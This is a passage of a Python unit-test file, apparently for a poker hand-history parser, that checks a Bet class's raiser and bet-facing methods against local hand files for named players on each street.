msg=file + ' ' + street + ' ' + player)
def test_raiser(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'a1-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
file = 'a2-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
file = 'a3-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('kr123445', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('kr123445', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('kr123445', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
file = 'a4-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('kr123445', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('kr123445', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('kr123445', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
file = 'a5-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
file = 'a6-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
file = 'r1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.raiser,
msg=file + ' ' + street + ' ' + player)
file = 'river.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.raiser,
msg=file + ' ' + street + ' ' + player)
def test_b_opp(self):
# folder containing the expected answers
folder = f + '/testy/rece/'
file = '__bug1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'AIONCMA1988'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
file = '__bug3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'turn', 'Smitty03300'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'river.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'Sfera2'
tmp = Bet(hand, strt, plr)
self.assertEqual(True, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'Zwidawurzn'
tmp = Bet(hand, strt, plr)
self.assertEqual(True, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'Sfera2'
tmp = Bet(hand, strt, plr)
self.assertEqual(True, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'Zwidawurzn'
tmp = Bet(hand, strt, plr)
self.assertEqual(True, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'Sfera2'
tmp = Bet(hand, strt, plr)
self.assertEqual(True, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'Zwidawurzn'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'ai.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'Chodemuncher'
tmp = Bet(hand, strt, plr)
self.assertEqual(True, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'Krumi1703'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'Chodemuncher'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'Krumi1703'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'Chodemuncher'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'Krumi1703'
tmp = Bet(hand, strt, plr)
self.assertEqual(False, tmp.b_opp(), msg=file + ' ' + strt + ' ' + plr)
def test_b(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'river.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = Bet(hand, 'flop', 'Sfera2')
self.assertEqual(False, tmp.b(), msg=file)
tmp = Bet(hand, 'flop', 'Zwidawurzn')
self.assertEqual(False, tmp.b(), msg=file)
tmp = Bet(hand, 'turn', 'Sfera2')
self.assertEqual(False, tmp.b(), msg=file)
tmp = Bet(hand, 'turn', 'Zwidawurzn')
self.assertEqual(False, tmp.b(), msg=file)
tmp = Bet(hand, 'river', 'Sfera2')
self.assertEqual(True, tmp.b(), msg=file)
tmp = Bet(hand, 'river', 'Zwidawurzn')
self.assertEqual(False, tmp.b(), msg=file)
file = 'f2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = Bet(hand, 'flop', 'kr123445')
self.assertEqual(True, tmp.b(), msg=file)
tmp = Bet(hand, 'flop', 'Zwidawurzn')
self.assertEqual(False, tmp.b(), msg=file)
tmp = Bet(hand, 'flop', 'Sfera2')
self.assertEqual(False, tmp.b(), msg=file)
def test_b_def_opp(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'river.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'turn', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'turn', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'river', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'river', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'f1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'f12.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'r1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-7.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_def_opp(),
msg=file + ' ' + street + ' ' + player)
def test_enum_b_def(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'river.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'turn', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'turn', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'river', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'river', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('call', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'f1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('2bet', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'f12.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('call', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'r1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('call', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('2bet', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('call', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
file = 'r1-7.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('2bet', tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_b_def(),
msg=file + ' ' + street + ' ' + player)
def test_b_raise_def_opp(self):
# folder containing the expected answers
folder = f + '/testy/rece/'
file = 'bug_b_raise_def_opp.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'OceanBlue100'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = '__bug5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'river', 'Action_Gibi'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'a1-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a1-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a1-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a2-6.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a3-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a3-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a3-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(True, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-2.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-3.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-4.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(False, tmp.b_raise_def_opp(),
msg=file + ' ' + street + ' ' + player)
file = 'a4-5.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
